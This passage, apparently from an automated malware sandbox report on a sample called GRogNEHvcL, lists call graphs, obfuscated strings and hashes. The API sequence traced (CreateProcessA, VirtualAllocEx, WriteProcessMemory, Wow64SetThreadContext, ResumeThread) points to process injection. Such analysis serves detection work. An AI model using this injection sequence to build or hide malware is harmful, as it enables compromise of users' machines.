6e47b9b 42088->42004 42092 6e47b68 42091->42092 42094 6e44eb0 WriteProcessMemory 42092->42094 42095 6e44ea8 WriteProcessMemory 42092->42095 42093 6e481e7 42093->42004 42094->42093 42095->42093 42098 6e481af 42096->42098 42097 6e47cde 42097->42004 42098->42097 42099 6e47b68 42098->42099 42224 6e443f1 42098->42224 42228 6e443f8 42098->42228 42101 6e44eb0 WriteProcessMemory 42099->42101 42102 6e44ea8 WriteProcessMemory 42099->42102 42100 6e481e7 42100->42004 42101->42100 42102->42100 42107 6e448e0 Wow64SetThreadContext 42105->42107 42108 6e448d8 Wow64SetThreadContext 42105->42108 42106 6e47b9b 42106->42004 42107->42106 42108->42106 42110 6e47a93 42109->42110 42232 6e4512d 42110->42232 42236 6e45138 42110->42236 42111 6e47b40 42112 6e481e7 42111->42112 42115 6e44eb0 WriteProcessMemory 42111->42115 42116 6e44ea8 WriteProcessMemory 42111->42116 42112->42004 42115->42112 42116->42112 42118 6e47d89 42117->42118 42120 6e44fa0 ReadProcessMemory 42118->42120 42121 6e44f99 ReadProcessMemory 42118->42121 42119 6e47f95 42119->42004 42120->42119 42121->42119 42123 6e47c6d 42122->42123 42125 6e47beb 42122->42125 42130 6e448e0 Wow64SetThreadContext 42123->42130 42131 6e448d8 Wow64SetThreadContext 42123->42131 42124 6e47cde 42124->42004 42125->42124 42126 6e47b68 42125->42126 42128 6e443f1 ResumeThread 42125->42128 42129 6e443f8 ResumeThread 42125->42129 42132 6e44eb0 WriteProcessMemory 42126->42132 42133 6e44ea8 WriteProcessMemory 42126->42133 42127 6e481e7 42127->42004 42128->42125 42129->42125 42130->42125 42131->42125 42132->42127 42133->42127 42136 6e480ad 42134->42136 42135 6e483da 42137 6e44eb0 WriteProcessMemory 42136->42137 42138 6e44ea8 WriteProcessMemory 42136->42138 42137->42135 42138->42135 42140 6e4826d 42139->42140 42141 6e4852e 42140->42141 42240 6e44df0 42140->42240 42244 6e44de8 42140->42244 42145 6e4820f 42144->42145 42146 6e4852e 42145->42146 42147 6e44df0 VirtualAllocEx 42145->42147 42148 6e44de8 VirtualAllocEx 42145->42148 42147->42146 42148->42146 42150 6e47b68 42149->42150 42152 6e44eb0 WriteProcessMemory 42150->42152 42153 6e44ea8 WriteProcessMemory 42150->42153 42151 6e481e7 42151->42004 42152->42151 42153->42151 42155 6e47bf8 42154->42155 42157 6e44fa0 ReadProcessMemory 42155->42157 42158 6e44f99 ReadProcessMemory 42155->42158 42156 6e47f95 42156->42004 42157->42156 42158->42156 42160 6e47efb 42159->42160 42162 6e44eb0 WriteProcessMemory 42160->42162 42163 6e44ea8 WriteProcessMemory 42160->42163 42161 6e481e7 42161->42004 42162->42161 42163->42161 42166 6e44eb0 WriteProcessMemory 42164->42166 42167 6e44ea8 WriteProcessMemory 42164->42167 42165 6e47ca2 42165->42004 42166->42165 42167->42165 42170 6e47bda 42168->42170 42169 6e47cde 42169->42004 42170->42169 42171 6e47b68 42170->42171 42175 6e443f1 ResumeThread 42170->42175 42176 6e443f8 ResumeThread 42170->42176 42173 6e44eb0 WriteProcessMemory 42171->42173 42174 6e44ea8 WriteProcessMemory 42171->42174 42172 6e481e7 42172->42004 42173->42172 42174->42172 42175->42170 42176->42170 42178 6e47b68 42177->42178 42178->42177 42180 6e44eb0 WriteProcessMemory 42178->42180 42181 6e44ea8 WriteProcessMemory 42178->42181 42179 6e481e7 42179->42004 42180->42179 42181->42179 42183 6e484af 42182->42183 42185 6e44df0 VirtualAllocEx 42183->42185 42186 6e44de8 VirtualAllocEx 42183->42186 42184 6e4852e 42185->42184 42186->42184 42188 6e47b0f 42187->42188 42189 6e47b40 42188->42189 42193 6e4512d CreateProcessA 42188->42193 42194 6e45138 CreateProcessA 42188->42194 42190 6e481e7 42189->42190 42191 6e44eb0 WriteProcessMemory 42189->42191 42192 6e44ea8 WriteProcessMemory 42189->42192 42190->42004 42191->42190 42192->42190 42193->42189 42194->42189 42196 6e47d2e 42195->42196 42197 6e47cca 42196->42197 42198 6e44df0 VirtualAllocEx 42196->42198 42199 6e44de8 VirtualAllocEx 42196->42199 42197->42004 42198->42197 42199->42197 42201 6e44ef8 WriteProcessMemory 42200->42201 42203 6e44f4f 42201->42203 42203->42077 42205 6e44eb0 WriteProcessMemory 42204->42205 42207 6e44f4f 42205->42207 42207->42077 42209 6e44feb ReadProcessMemory 42208->42209 42211 6e4502f 42209->42211 42211->42082 42213 6e44fa0 ReadProcessMemory 42212->42213 42215 6e4502f 42213->42215 42215->42082 42217 6e44925 Wow64SetThreadContext 42216->42217 42219 6e4496d 42217->42219 42219->42088 42221 6e44925 Wow64SetThreadContext 42220->42221 42223 6e4496d 42221->42223 42223->42088 42225 6e443f8 ResumeThread 42224->42225 42227 6e44469 42225->42227 42227->42098 42229 6e44438 ResumeThread 42228->42229 42231 6e44469 42229->42231 42231->42098 42233 6e451c1 CreateProcessA 42232->42233 42235 6e45383 42233->42235 42237 6e451c1 CreateProcessA 42236->42237 42239 6e45383 42237->42239 42239->42239 42241 6e44e30 VirtualAllocEx 42240->42241 42243 6e44e6d 42241->42243 42243->42141 42245 6e44e30 VirtualAllocEx 42244->42245 42247 6e44e6d 42245->42247 42247->42141

                                            Executed Functions

                                            Function 08493C30 Relevance: 8.0, Strings: 6, Instructions: 498COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 897 8493c30-8493c3a 898 8493c5c-8493c8e 897->898 899 8493c3c-8493c3f 897->899 909 8493c96 898->909 900 8493c48-8493c5a 899->900 901 8493c41 899->901 900->899 901->898 901->900 902 8493c98-8493c9d 901->902 903 8493c9f-8493cc6 901->903 902->899 910 8493cf9-8493d2d 903->910 911 8493cc8-8493cd6 903->911 909->902 915 8493d2f-8493d41 910->915 916 8493d50-8493d51 910->916 911->910 912 8493cd8-8493ceb 911->912 912->910 913 8493ced-8493cf8 912->913 919 8493d63-8493d72 915->919 917 8493d53-8493d61 916->917 918 8493d74 916->918 923 8493d43-8493d46 917->923 921 8493d76 918->921 919->918 920 8493d78-8493d7f 919->920 924 8493e2f-8493e9b 920->924 925 8493d85-8493d94 920->925 921->923 926 8493d48 923->926 927 8493d4f 923->927 932 8493ecc-8493ed1 924->932 925->921 926->919 926->927 929 8493e1a-8493e2e 926->929 930 8493de5-8493de7 926->930 931 8493d96-8493dd5 926->931 927->916 933 8493de9-8493def 930->933 934 8493e03 930->934 931->924 969 8493dd7-8493de0 931->969 937 8493e9d-8493ea0 932->937 935 8493df1-8493df3 933->935 936 8493df5-8493df7 933->936 938 8493e05-8493e15 934->938 943 8493e01 935->943 936->943 941 8493ea9-8493ebd 937->941 942 8493ea2 937->942 938->923 960 8493f6b-849401c 941->960 962 8493ec3-8493eca 941->962 942->932 942->941 944 8493efb-8493f0c 942->944 945 8493f4b-8493f5e 942->945 946 8493f1d-8493f30 942->946 947 8493f0e-8493f16 942->947 948 8493f61-8493f66 942->948 949 8493ed3-8493ee2 942->949 950 8493ef2 942->950 951 8493ef4-8493ef9 942->951 943->938 944->937 954 8493f32-8493f39 946->954 955 8493f44-8493f49 946->955 947->946 948->937 957 8493eeb-8493ef0 949->957 958 8493ee4 949->958 950->951 951->937 954->960 961 8493f3b 954->961 963 8493f3f 955->963 965 8493ee9 957->965 958->965 976 84940ca-849410d 960->976 977 8494022-849402f 960->977 961->963 962->937 963->937 965->937 969->923 981 849410f-8494112 976->981 982 849413e-8494169 976->982 977->976 978 8494035-8494042 977->978 978->976 980 8494048-8494055 978->980 980->976 983 8494057-8494064 980->983 984 849411b-849412f 981->984 985 8494114 981->985 992 849416f-849417f 982->992 993 8494546-849454e 982->993 983->976 986 8494066-8494073 983->986 984->993 1002 8494135-849413c 984->1002 985->982 988 849447f-8494485 985->988 989 8494495-8494497 985->989 990 84942d6-84942e3 985->990 986->976 987 8494075-8494082 986->987 987->976 995 8494084-8494091 987->995 997 849448e-8494493 988->997 998 8494487 988->998 999 8494499-849449f 989->999 1000 84944b5 989->1000 990->993 996 84942e9-84942fc 990->996 992->993 1001 8494185-8494197 992->1001 995->976 1003 8494093-84940c9 call 8492db0 995->1003 996->993 1004 8494302-8494320 996->1004 997->989 1006 8494489 997->1006 998->1006 1007 84944a1-84944a3 999->1007 1008 84944a5-84944b1 999->1008 1005 84944b7-84944d7 1000->1005 1001->993 1009 849419d-84941a7 1001->1009 1002->981 1002->982 1004->981 1017 84944d9-84944eb 1005->1017 1018 84944ed 1005->1018 1006->981 1011 84944b3 1007->1011 1008->1011 1009->981 1011->1005 1019 84944f0-8494500 1017->1019 1018->1019 1019->993 1024 8494502-8494508 1019->1024 1025 849450a 1024->1025 1026 849450d-8494510 1024->1026 1025->1026 1026->981
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8aq$8aq$8aq$LR]q$LR]q$$]q
                                            • API String ID: 0-687213661
                                            • Opcode ID: 2123ddc456adc5aa8ae6a7aceb727f26fc2dcfe05814433716115f6a00bf210d
                                            • Instruction ID: e699b5b62194e3914e22a537a6ca47564cf45d00ba41169f074132a7690e395e
                                            • Opcode Fuzzy Hash: 2123ddc456adc5aa8ae6a7aceb727f26fc2dcfe05814433716115f6a00bf210d
                                            • Instruction Fuzzy Hash: B0120E30A09244DFCB25CFA8C9546AABFF1FF46302F1485ABE091DB392D7388946CB55
                                            Function 08494B62 Relevance: 30.6, Strings: 24, Instructions: 569COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$ fbq$ fbq$ fbq$ fbq$ fbq$ fbq$Te]q$Te]q$Te]q$XX]q$XX]q$XX]q$XX]q$XX]q$XX]q$XX]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-2160474337
                                            • Opcode ID: b2c18fa067f90b9cb090f893ea742594abae57f82c712ec8d55089804c5c6e07
                                            • Instruction ID: d742b89c17d0f1fb0ab921c8908bfcb94a426e818ca4ce11351f54c1dccf714c
                                            • Opcode Fuzzy Hash: b2c18fa067f90b9cb090f893ea742594abae57f82c712ec8d55089804c5c6e07
                                            • Instruction Fuzzy Hash: 93228E30E00218CFDF258F98D554A6EBBB2BF84302F65855BE8829B395C7749D43CB95
                                            Function 084933F8 Relevance: 15.4, Strings: 12, Instructions: 427COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 519 84933f8-8493431 520 849343c 519->520 674 8493436 call 8493b75 519->674 672 849343c call 8493c20 520->672 673 849343c call 8493c30 520->673 521 8493442-84934a7 call 8492d8c 531 84934a9-84934ac 521->531 532 84934ae 531->532 533 84934b5-84934bc 531->533 532->533 534 84935c9-84935cf 532->534 535 8493869-84938e0 532->535 536 84934c8-84934ce 532->536 537 84935aa-84935b6 532->537 538 849376a-8493771 532->538 539 849352d-8493537 532->539 540 84935a0-84935a5 532->540 541 84936c3-84936c7 532->541 542 8493666-849366a 532->542 543 8493779 532->543 544 849363b-849364e 532->544 545 849379b-8493828 532->545 546 849353a-849353e 532->546 547 84936fd 532->547 548 8493551-8493557 532->548 549 84936f3-84936f8 532->549 550 8493755-8493762 532->550 551 8493736-8493745 532->551 552 8493650 533->552 553 84934c2-84934c6 533->553 570 84935d1-84935d3 534->570 571 84935d5-84935e1 534->571 651 84938f8-8493900 535->651 652 84938e2-84938e8 535->652 554 84934d0-84934d2 536->554 555 84934d4-84934e0 536->555 567 84935b8 537->567 568 84935c2-84935c7 537->568 557 849377c-8493781 538->557 558 8493773-8493777 538->558 539->546 540->531 565 84936c9-84936d2 541->565 566 84936ea 541->566 559 849368b 542->559 560 849366c-8493675 542->560 577 8493786-8493789 543->577 556 8493655 544->556 677 849382b call 84989a8 545->677 678 849382b call 84989b8 545->678 561 849354a-849354f 546->561 562 8493540 546->562 575 849372a-849372d 547->575 563 8493559-849355b 548->563 564 849355d-8493569 548->564 569 849365a-849365d 549->569 550->538 591 849374e-8493753 551->591 592 8493747 551->592 552->556 553->531 574 84934e2-8493501 554->574 555->574 556->569 557->577 558->575 586 849368e-8493690 559->586 584 849367c-849367f 560->584 585 8493677-849367a 560->585 561->548 576 8493545 561->576 562->576 579 849356b-849359b 563->579 564->579 587 84936d9-84936e6 565->587 588 84936d4-84936d7 565->588 589 84936ed 566->589 580 84935bd 567->580 568->534 568->580 569->542 583 849365f 569->583 581 84935e3-84935f8 570->581 571->581 623 8493509-8493516 574->623 575->551 606 849372f 575->606 576->531 577->545 598 849378b 577->598 579->531 580->531 675 84935fa call 8496478 581->675 676 84935fa call 849646b 581->676 583->535 583->538 583->541 583->542 583->543 583->545 583->547 583->549 583->550 583->551 593 8493905-8493913 583->593 594 8493a24 583->594 595 84939fb-8493a08 583->595 596 8493952-84939c5 583->596 597 8493a35-8493a3c 583->597 599 8493689 584->599 585->599 601 84936bc-84936c1 586->601 602 8493692-849369c 586->602 604 84936e8 587->604 588->604 589->549 591->550 607 849374c 591->607 592->607 628 849392b-849393f call 8499d64 call 849ace9 593->628 629 8493915-849391b 593->629 621 8493a2b-8493a30 594->621 668 8493a0a call 8496478 595->668 669 8493a0a call 849646b 595->669 664 84939cb-84939e4 596->664 598->535 598->545 598->593 598->594 598->595 598->596 598->597 599->586 601->541 615 84936ba 601->615 613 849369e-84936af 602->613 614 8493700-8493725 602->614 604->589 606->535 606->538 606->543 606->545 606->550 606->551 606->593 606->594 606->595 606->596 606->597 607->575 613->614 618 84936b1-84936b8 613->618 614->575 615->569 618->615 621->577 623->552 632 849351c-8493528 623->632 626 8493600-8493636 626->531 646 8493945-849394d 628->646 634 849391d 629->634 635 849391f-8493921 629->635 632->531 633 8493a10-8493a1e call 849bbf8 633->594 634->628 635->628 646->577 651->577 654 84938ea 652->654 655 84938ec-84938ee 652->655 654->651 655->651 657 8493831-8493833 658 849384b-8493855 657->658 659 8493835-849383b 657->659 658->557 663 849385b-8493864 658->663 661 849383d 659->661 662 849383f-8493841 659->662 661->658 662->658 663->577 664->557 666 84939ea-84939f6 664->666 666->577 668->633 669->633 672->521 673->521 674->520 675->626 676->626 677->657 678->657
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1756099846
                                            • Opcode ID: d7e21e7181aeb19f44826ef9ccbc419edc787a8ab4aa687993e67a8ead40e440
                                            • Instruction ID: dd48f0b866ec1b9797aa144bec8dab10dc44efaf097652e7c1f2507bf57c6664
                                            • Opcode Fuzzy Hash: d7e21e7181aeb19f44826ef9ccbc419edc787a8ab4aa687993e67a8ead40e440
                                            • Instruction Fuzzy Hash: 9EF1AF74B40208DFDF249FA8D95976EBEE2AF89701F10846AE4529B384DE748C42CB95
                                            Function 08495001 Relevance: 10.2, Strings: 8, Instructions: 211COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 679 8495001-8495005 680 849501d-8495037 679->680 681 8495007-849500d 679->681 685 8495039-8495042 680->685 686 849505a 680->686 682 849500f 681->682 683 8495011-8495013 681->683 682->680 683->680 688 8495049-8495056 685->688 689 8495044-8495047 685->689 687 849505d-8495086 call 84961d0 686->687 693 849508c-8495094 687->693 690 8495058 688->690 689->690 690->687 694 8494fe1-8494fe4 693->694 695 8494ff6-8495005 694->695 696 8494fe6 694->696 695->680 695->681 696->695 697 8495099-849509d 696->697 698 84951e9-84951ee 696->698 699 849517b-849518e 696->699 700 849524d-8495251 696->700 701 849534d-8495361 696->701 702 849511e-8495122 696->702 703 8495200-8495213 696->703 704 8495243-8495248 696->704 705 84951f3-84951fb 696->705 706 8495364-849536d 696->706 707 84952e7-84952eb 696->707 711 849509f-84950a8 697->711 712 84950c0 697->712 698->694 734 8495370-8495376 699->734 735 8495194-84951a9 699->735 709 8495253-849525c 700->709 710 8495274 700->710 713 8495145 702->713 714 8495124-849512d 702->714 740 849522b-8495232 703->740 741 8495215-849521c 703->741 704->694 705->694 715 84952ed-84952f6 707->715 716 849530e 707->716 719 849525e-8495261 709->719 720 8495263-8495270 709->720 724 8495277-849527b 710->724 721 84950aa-84950ad 711->721 722 84950af-84950bc 711->722 730 84950c3-84950c7 712->730 717 8495148-849516c 713->717 726 849512f-8495132 714->726 727 8495134-8495141 714->727 728 84952f8-84952fb 715->728 729 84952fd-849530a 715->729 718 8495311-849532c 716->718 717->734 759 8495172-8495176 717->759 771 8495338-8495342 718->771 772 849532e 718->772 732 8495272 719->732 720->732 733 84950be 721->733 722->733 736 849527d-8495286 724->736 737 849529e 724->737 742 8495143 726->742 727->742 743 849530c 728->743 729->743 738 84950c9-84950d2 730->738 739 84950ea 730->739 732->724 733->730 765 84951bb 735->765 766 84951ab-84951b9 735->766 751 8495288-849528b 736->751 752 849528d-849529a 736->752 755 84952a1-84952ad 737->755 753 84950d9-84950e6 738->753 754 84950d4-84950d7 738->754 756 84950ed-8495119 739->756 740->734 746 8495238-8495241 740->746 741->734 757 8495222 741->757 742->717 743->718 758 8495226 746->758 761 849529c 751->761 752->761 762 84950e8 753->762 754->762 774 84952af-84952b5 755->774 775 84952c5-84952d2 755->775 756->694 757->758 758->694 759->694 761->755 762->756 773 84951bd-84951bf 765->773 766->773 771->734 777 8495344-849534b 771->777 776 8495333 772->776 778 84951d9-84951e2 773->778 779 84951c1-84951c7 773->779 780 84952b9-84952bb 774->780 781 84952b7 774->781 775->734 782 84952d8-84952e2 775->782 776->694 777->776 778->698 784 84951c9 779->784 785 84951cb-84951d7 779->785 780->775 781->775 782->694 784->778 785->778
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$ fbq$Te]q$XX]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1505870616
                                            • Opcode ID: 9374def10d0ca11d27e956ecee9bac3a563b16fc95040fadebd3f8014f0eb2b2
                                            • Instruction ID: 3f8e74a717ba776f32923b4de22ce97a44a9dc3a491a78457509b62271dfede6
                                            • Opcode Fuzzy Hash: 9374def10d0ca11d27e956ecee9bac3a563b16fc95040fadebd3f8014f0eb2b2
                                            • Instruction Fuzzy Hash: DB818E30E04218DFDF3A8E98D544AAEBBB2BB41712F66815BE4826B395D7349C43CF41
                                            Function 08494FDC Relevance: 10.2, Strings: 8, Instructions: 202COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 788 8494fdc 789 8494fe1-8494fe4 788->789 790 8494ff6-8495005 789->790 791 8494fe6 789->791 812 849501d-8495037 790->812 813 8495007-849500d 790->813 791->790 792 8495099-849509d 791->792 793 84951e9-84951ee 791->793 794 849517b-849518e 791->794 795 849524d-8495251 791->795 796 849534d-8495361 791->796 797 849511e-8495122 791->797 798 8495200-8495213 791->798 799 8495243-8495248 791->799 800 84951f3-84951fb 791->800 801 8495364-849536d 791->801 802 84952e7-84952eb 791->802 806 849509f-84950a8 792->806 807 84950c0 792->807 793->789 831 8495370-8495376 794->831 832 8495194-84951a9 794->832 804 8495253-849525c 795->804 805 8495274 795->805 808 8495145 797->808 809 8495124-849512d 797->809 839 849522b-8495232 798->839 840 8495215-849521c 798->840 799->789 800->789 810 84952ed-84952f6 802->810 811 849530e 802->811 816 849525e-8495261 804->816 817 8495263-8495270 804->817 821 8495277-849527b 805->821 818 84950aa-84950ad 806->818 819 84950af-84950bc 806->819 827 84950c3-84950c7 807->827 814 8495148-849516c 808->814 823 849512f-8495132 809->823 824 8495134-8495141 809->824 825 84952f8-84952fb 810->825 826 84952fd-849530a 810->826 815 8495311-849532c 811->815 864 8495039-8495042 812->864 865 849505a 812->865 837 849500f 813->837 838 8495011-8495013 813->838 814->831 859 8495172-8495176 814->859 876 8495338-8495342 815->876 877 849532e 815->877 829 8495272 816->829 817->829 830 84950be 818->830 819->830 833 849527d-8495286 821->833 834 849529e 821->834 841 8495143 823->841 824->841 842 849530c 825->842 826->842 835 84950c9-84950d2 827->835 836 84950ea 827->836 829->821 830->827 868 84951bb 832->868 869 84951ab-84951b9 832->869 850 8495288-849528b 833->850 851 849528d-849529a 833->851 854 84952a1-84952ad 834->854 852 84950d9-84950e6 835->852 853 84950d4-84950d7 835->853 855 84950ed-8495119 836->855 837->812 838->812 839->831 845 8495238-8495241 839->845 840->831 857 8495222 840->857 841->814 842->815 858 8495226 845->858 861 849529c 850->861 851->861 862 84950e8 852->862 853->862 879 84952af-84952b5 854->879 880 84952c5-84952d2 854->880 855->789 857->858 858->789 859->789 861->854 862->855 874 8495049-8495056 864->874 875 8495044-8495047 864->875 866 849505d-8495086 call 84961d0 865->866 894 849508c-8495094 866->894 878 84951bd-84951bf 868->878 869->878 881 8495058 874->881 875->881 876->831 884 8495344-849534b 876->884 883 8495333 877->883 885 84951d9-84951e2 878->885 886 84951c1-84951c7 878->886 887 84952b9-84952bb 879->887 888 84952b7 879->888 880->831 889 84952d8-84952e2 880->889 881->866 883->789 884->883 885->793 892 84951c9 886->892 893 84951cb-84951d7 886->893 887->880 888->880 889->789 892->885 893->885 894->789
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$ fbq$Te]q$XX]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1505870616
                                            • Opcode ID: ccf27621df59362b101641a3ded5d8e6f5bc46a4f1aa1650741144b5f607d1b8
                                            • Instruction ID: 84a328081137168e539cd9878b5add912c4ca55061f37c058f4d82dbf4c48f4f
                                            • Opcode Fuzzy Hash: ccf27621df59362b101641a3ded5d8e6f5bc46a4f1aa1650741144b5f607d1b8
                                            • Instruction Fuzzy Hash: 83715F30E04218DFDF3A8E99D544A6EBBB2AB40712F36855BE482AB395D7349C43CF51
                                            Function 084933E8 Relevance: 7.9, Strings: 6, Instructions: 385COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1027 84933e8-849343c call 8493b75 1178 849343c call 8493c20 1027->1178 1179 849343c call 8493c30 1027->1179 1030 8493442-84934a7 call 8492d8c 1040 84934a9-84934ac 1030->1040 1041 84934ae 1040->1041 1042 84934b5-84934bc 1040->1042 1041->1042 1043 84935c9-84935cf 1041->1043 1044 8493869-84938e0 1041->1044 1045 84934c8-84934ce 1041->1045 1046 84935aa-84935b6 1041->1046 1047 849376a-8493771 1041->1047 1048 849352d-8493537 1041->1048 1049 84935a0-84935a5 1041->1049 1050 84936c3-84936c7 1041->1050 1051 8493666-849366a 1041->1051 1052 8493779 1041->1052 1053 849363b-849364e 1041->1053 1054 849379b-8493828 1041->1054 1055 849353a-849353e 1041->1055 1056 84936fd 1041->1056 1057 8493551-8493557 1041->1057 1058 84936f3-84936f8 1041->1058 1059 8493755-8493762 1041->1059 1060 8493736-8493745 1041->1060 1061 8493650 1042->1061 1062 84934c2-84934c6 1042->1062 1079 84935d1-84935d3 1043->1079 1080 84935d5-84935e1 1043->1080 1160 84938f8-8493900 1044->1160 1161 84938e2-84938e8 1044->1161 1063 84934d0-84934d2 1045->1063 1064 84934d4-84934e0 1045->1064 1076 84935b8 1046->1076 1077 84935c2-84935c7 1046->1077 1066 849377c-8493781 1047->1066 1067 8493773-8493777 1047->1067 1048->1055 1049->1040 1074 84936c9-84936d2 1050->1074 1075 84936ea 1050->1075 1068 849368b 1051->1068 1069 849366c-8493675 1051->1069 1086 8493786-8493789 1052->1086 1065 8493655 1053->1065 1182 849382b call 84989a8 1054->1182 1183 849382b call 84989b8 1054->1183 1070 849354a-849354f 1055->1070 1071 8493540 1055->1071 1084 849372a-849372d 1056->1084 1072 8493559-849355b 1057->1072 1073 849355d-8493569 1057->1073 1078 849365a-849365d 1058->1078 1059->1047 1100 849374e-8493753 1060->1100 1101 8493747 1060->1101 1061->1065 1062->1040 1083 84934e2-8493501 1063->1083 1064->1083 1065->1078 1066->1086 1067->1084 1095 849368e-8493690 1068->1095 1093 849367c-849367f 1069->1093 1094 8493677-849367a 1069->1094 1070->1057 1085 8493545 1070->1085 1071->1085 1088 849356b-849359b 1072->1088 1073->1088 1096 84936d9-84936e6 1074->1096 1097 84936d4-84936d7 1074->1097 1098 84936ed 1075->1098 1089 84935bd 1076->1089 1077->1043 1077->1089 1078->1051 1092 849365f 1078->1092 1090 84935e3-84935f8 1079->1090 1080->1090 1132 8493509-8493516 1083->1132 1084->1060 1115 849372f 1084->1115 1085->1040 1086->1054 1107 849378b 1086->1107 1088->1040 1089->1040 1180 84935fa call 8496478 1090->1180 1181 84935fa call 849646b 1090->1181 1092->1044 1092->1047 1092->1050 1092->1051 1092->1052 1092->1054 1092->1056 1092->1058 1092->1059 1092->1060 1102 8493905-8493913 1092->1102 1103 8493a24 1092->1103 1104 84939fb-8493a08 1092->1104 1105 8493952-84939c5 1092->1105 1106 8493a35-8493a3c 1092->1106 1108 8493689 1093->1108 1094->1108 1110 84936bc-84936c1 1095->1110 1111 8493692-849369c 1095->1111 1113 84936e8 1096->1113 1097->1113 1098->1058 1100->1059 1116 849374c 1100->1116 1101->1116 1137 849392b-849393f call 8499d64 call 849ace9 1102->1137 1138 8493915-849391b 1102->1138 1130 8493a2b-8493a30 1103->1130 1185 8493a0a call 8496478 1104->1185 1186 8493a0a call 849646b 1104->1186 1173 84939cb-84939e4 1105->1173 1107->1044 1107->1054 1107->1102 1107->1103 1107->1104 1107->1105 1107->1106 1108->1095 1110->1050 1124 84936ba 1110->1124 1122 849369e-84936af 1111->1122 1123 8493700-8493725 1111->1123 1113->1098 1115->1044 1115->1047 1115->1052 1115->1054 1115->1059 1115->1060 1115->1102 1115->1103 1115->1104 1115->1105 1115->1106 1116->1084 1122->1123 1127 84936b1-84936b8 1122->1127 1123->1084 1124->1078 1127->1124 1130->1086 1132->1061 1141 849351c-8493528 1132->1141 1135 8493600-8493636 1135->1040 1155 8493945-849394d 1137->1155 1143 849391d 1138->1143 1144 849391f-8493921 1138->1144 1141->1040 1142 8493a10-8493a1e call 849bbf8 1142->1103 1143->1137 1144->1137 1155->1086 1160->1086 1163 84938ea 1161->1163 1164 84938ec-84938ee 1161->1164 1163->1160 1164->1160 1166 8493831-8493833 1167 849384b-8493855 1166->1167 1168 8493835-849383b 1166->1168 1167->1066 1172 849385b-8493864 1167->1172 1170 849383d 1168->1170 1171 849383f-8493841 1168->1171 1170->1167 1171->1167 1172->1086 1173->1066 1175 84939ea-84939f6 1173->1175 1175->1086 1178->1030 1179->1030 1180->1135 1181->1135 1182->1166 1183->1166 1185->1142 1186->1142
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$Te]q$Te]q$$]q$$]q
                                            • API String ID: 0-3261640282
                                            • Opcode ID: bd29b4dc6fad9e0f82876997adb33d767e79116a69d39cc36772932b3c1ec88a
                                            • Instruction ID: a3a3f4811f4b4b9ba6ce0bdbd1042cd81bb61d210f8a02e4135c4bc15fc50c7d
                                            • Opcode Fuzzy Hash: bd29b4dc6fad9e0f82876997adb33d767e79116a69d39cc36772932b3c1ec88a
                                            • Instruction Fuzzy Hash: 60E19074F00208DFDF249F68D95976EBEE2AF89712F10846AE4529B384DF748C42CB95
                                            Function 08498B50 Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
